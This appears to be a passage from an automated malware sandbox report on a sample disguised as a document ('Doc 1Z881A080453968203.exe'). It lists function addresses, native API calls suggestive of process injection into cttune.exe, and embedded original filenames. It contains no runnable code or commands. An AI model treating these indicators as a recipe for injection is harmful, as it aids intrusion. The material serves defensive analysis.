                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2AD0 NtReadFile,LdrInitializeThunk,14_2_04FB2AD0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04FB2BF0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04FB2BE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_04FB2BA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2B60 NtClose,LdrInitializeThunk,14_2_04FB2B60
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB35C0 NtCreateMutant,LdrInitializeThunk,14_2_04FB35C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB39B0 NtGetContextThread,LdrInitializeThunk,14_2_04FB39B0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2CF0 NtOpenProcess,14_2_04FB2CF0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2CC0 NtQueryVirtualMemory,14_2_04FB2CC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2C00 NtQueryInformationProcess,14_2_04FB2C00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2DB0 NtEnumerateKey,14_2_04FB2DB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2D00 NtSetInformationFile,14_2_04FB2D00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2EA0 NtAdjustPrivilegesToken,14_2_04FB2EA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2E30 NtWriteVirtualMemory,14_2_04FB2E30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2FA0 NtQuerySection,14_2_04FB2FA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2F90 NtProtectVirtualMemory,14_2_04FB2F90
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2F60 NtCreateProcessEx,14_2_04FB2F60
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2AB0 NtWaitForSingleObject,14_2_04FB2AB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2B80 NtQueryInformationFile,14_2_04FB2B80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB3090 NtSetValueKey,14_2_04FB3090
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB3010 NtOpenDirectoryObject,14_2_04FB3010
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB3D70 NtOpenThread,14_2_04FB3D70
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB3D10 NtOpenProcessToken,14_2_04FB3D10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F27640 NtCreateFile,14_2_02F27640
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F277A0 NtReadFile,14_2_02F277A0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F27A70 NtAllocateVirtualMemory,14_2_02F27A70
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F27880 NtDeleteFile,14_2_02F27880
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F27910 NtClose,14_2_02F27910
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 0_2_0146EFC40_2_0146EFC4
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 0_2_054901A80_2_054901A8
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 0_2_0549F6980_2_0549F698
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 0_2_05491D180_2_05491D18
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 0_2_05491D280_2_05491D28
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 0_2_054919910_2_05491991
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 0_2_054919A00_2_054919A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 0_2_054986E80_2_054986E8
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004028A07_2_004028A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004011207_2_00401120
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004049847_2_00404984
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004012807_2_00401280
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0040FAAA7_2_0040FAAA
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0040FAB37_2_0040FAB3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0042D3237_2_0042D323
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004033307_2_00403330
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004163E37_2_004163E3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004023AB7_2_004023AB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004023B07_2_004023B0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0040FCD37_2_0040FCD3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004025467_2_00402546
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004025507_2_00402550
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0040DD537_2_0040DD53
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_00402EC07_2_00402EC0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_00402EBC7_2_00402EBC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0040DF2B7_2_0040DF2B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B81587_2_017B8158
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CA1187_2_017CA118
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017201007_2_01720100
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E81CC7_2_017E81CC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F01AA7_2_017F01AA
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C20007_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EA3527_2_017EA352
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E3F07_2_0173E3F0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F03E67_2_017F03E6
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D02747_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B02C07_2_017B02C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017305357_2_01730535
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F05917_2_017F0591
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E24467_2_017E2446
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D44207_2_017D4420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DE4F67_2_017DE4F6
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017307707_2_01730770
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017547507_2_01754750
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172C7C07_2_0172C7C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174C6E07_2_0174C6E0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017469627_2_01746962
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017329A07_2_017329A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017FA9A67_2_017FA9A6
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173A8407_2_0173A840
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017328407_2_01732840
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E8F07_2_0175E8F0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017168B87_2_017168B8
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EAB407_2_017EAB40
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E6BD77_2_017E6BD7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA807_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CCD1F7_2_017CCD1F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173AD007_2_0173AD00
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172ADE07_2_0172ADE0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01748DBF7_2_01748DBF
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730C007_2_01730C00
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720CF27_2_01720CF2
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0CB57_2_017D0CB5
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A4F407_2_017A4F40
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01750F307_2_01750F30
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D2F307_2_017D2F30
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01772F287_2_01772F28
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173CFE07_2_0173CFE0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01722FC87_2_01722FC8
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AEFA07_2_017AEFA0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730E597_2_01730E59
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EEE267_2_017EEE26
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EEEDB7_2_017EEEDB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01742E907_2_01742E90
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017ECE937_2_017ECE93
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171F1727_2_0171F172
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017FB16B7_2_017FB16B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0176516C7_2_0176516C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173B1B07_2_0173B1B0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E70E97_2_017E70E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EF0E07_2_017EF0E0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DF0CC7_2_017DF0CC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017370C07_2_017370C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171D34C7_2_0171D34C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E132D7_2_017E132D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0177739A7_2_0177739A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D12ED7_2_017D12ED
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174B2C07_2_0174B2C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017352A07_2_017352A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E75717_2_017E7571
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CD5B07_2_017CD5B0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017214607_2_01721460
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EF43F7_2_017EF43F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EF7B07_2_017EF7B0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E16CC7_2_017E16CC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017399507_2_01739950
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174B9507_2_0174B950
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C59107_2_017C5910
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179D8007_2_0179D800
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017338E07_2_017338E0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EFB767_2_017EFB76
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A5BF07_2_017A5BF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0176DBF97_2_0176DBF9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174FB807_2_0174FB80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A3A6C7_2_017A3A6C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EFA497_2_017EFA49
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E7A467_2_017E7A46
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DDAC67_2_017DDAC6
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CDAAC7_2_017CDAAC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01775AA07_2_01775AA0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D1AA37_2_017D1AA3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E7D737_2_017E7D73
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E1D5A7_2_017E1D5A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01733D407_2_01733D40
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174FDC07_2_0174FDC0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A9C327_2_017A9C32
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EFCF27_2_017EFCF2
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EFF097_2_017EFF09
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_016F3FD57_2_016F3FD5
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_016F3FD27_2_016F3FD2
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EFFB17_2_017EFFB1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01731F927_2_01731F92
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01739EB07_2_01739EB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0504059114_2_05040591
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503244614_2_05032446
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8053514_2_04F80535
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0502E4F614_2_0502E4F6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F9C6E014_2_04F9C6E0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F7C7C014_2_04F7C7C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8077014_2_04F80770
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FA475014_2_04FA4750
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0501A11814_2_0501A118
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0500815814_2_05008158
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_050401AA14_2_050401AA
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_050381CC14_2_050381CC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F7010014_2_04F70100
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503A35214_2_0503A352
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_050403E614_2_050403E6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8E3F014_2_04F8E3F0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0502027414_2_05020274
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_050002C014_2_050002C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F70CF214_2_04F70CF2
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F80C0014_2_04F80C00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F7ADE014_2_04F7ADE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F98DBF14_2_04F98DBF
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_05020CB514_2_05020CB5
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8AD0014_2_04F8AD00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F92E9014_2_04F92E90
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F80E5914_2_04F80E59
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8CFE014_2_04F8CFE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503EE2614_2_0503EE26
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F72FC814_2_04F72FC8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FFEFA014_2_04FFEFA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503CE9314_2_0503CE93
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FF4F4014_2_04FF4F40
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FA0F3014_2_04FA0F30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FC2F2814_2_04FC2F28
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503EEDB14_2_0503EEDB
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FAE8F014_2_04FAE8F0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F668B814_2_04F668B8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0504A9A614_2_0504A9A6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8A84014_2_04F8A840
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8284014_2_04F82840
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F829A014_2_04F829A0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F9696214_2_04F96962
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503AB4014_2_0503AB40
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F7EA8014_2_04F7EA80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_05036BD714_2_05036BD7
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503757114_2_05037571
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F7146014_2_04F71460
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0501D5B014_2_0501D5B0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503F43F14_2_0503F43F
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503F7B014_2_0503F7B0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_050316CC14_2_050316CC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F870C014_2_04F870C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0504B16B14_2_0504B16B
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8B1B014_2_04F8B1B0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F6F17214_2_04F6F172
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB516C14_2_04FB516C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0502F0CC14_2_0502F0CC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503F0E014_2_0503F0E0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_050370E914_2_050370E9
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503132D14_2_0503132D
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F9B2C014_2_04F9B2C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F852A014_2_04F852A0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FC739A14_2_04FC739A
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F6D34C14_2_04F6D34C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_050212ED14_2_050212ED
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_05031D5A14_2_05031D5A
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_05037D7314_2_05037D73
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FF9C3214_2_04FF9C32
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F9FDC014_2_04F9FDC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F83D4014_2_04F83D40
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503FCF214_2_0503FCF2
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503FF0914_2_0503FF09
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F89EB014_2_04F89EB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503FFB114_2_0503FFB1
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F81F9214_2_04F81F92
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F838E014_2_04F838E0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FED80014_2_04FED800
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F8995014_2_04F89950
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F9B95014_2_04F9B950
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FC5AA014_2_04FC5AA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503FB7614_2_0503FB76
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FF3A6C14_2_04FF3A6C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FBDBF914_2_04FBDBF9
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FF5BF014_2_04FF5BF0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_05037A4614_2_05037A46
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0503FA4914_2_0503FA49
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F9FB8014_2_04F9FB80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0501DAAC14_2_0501DAAC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_0502DAC614_2_0502DAC6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F112E014_2_02F112E0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F013A114_2_02F013A1
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F0C6F014_2_02F0C6F0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F0A77014_2_02F0A770
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F0C4D014_2_02F0C4D0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F0C4C714_2_02F0C4C7
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F0A94814_2_02F0A948
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F12E0014_2_02F12E00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F29D4014_2_02F29D40
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04F6B970 appears 272 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04FB5130 appears 37 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04FEEA12 appears 86 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04FFF290 appears 105 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04FC7E54 appears 98 times
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: String function: 017AF290 appears 105 times
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: String function: 01777E54 appears 102 times
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: String function: 0179EA12 appears 86 times
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: String function: 0171B970 appears 280 times
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: String function: 01765130 appears 58 times
                Source: Doc 1Z881A080453968203.exe, 00000000.00000000.1350167796.0000000000B32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeawO.exe8 vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exe, 00000000.00000002.1417378517.0000000006310000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exe, 00000000.00000002.1407364422.000000000109E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exe, 00000000.00000002.1415284131.00000000041C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exe, 00000000.00000002.1416840004.00000000053E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exe, 00000000.00000002.1414525368.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exe, 00000007.00000002.2037717484.000000000181D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exe, 00000007.00000002.2037453632.0000000001138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCTTUNE.EXEj% vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exeBinary or memory string: OriginalFilenameeawO.exe8 vs Doc 1Z881A080453968203.exe
                Source: Doc 1Z881A080453968203.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
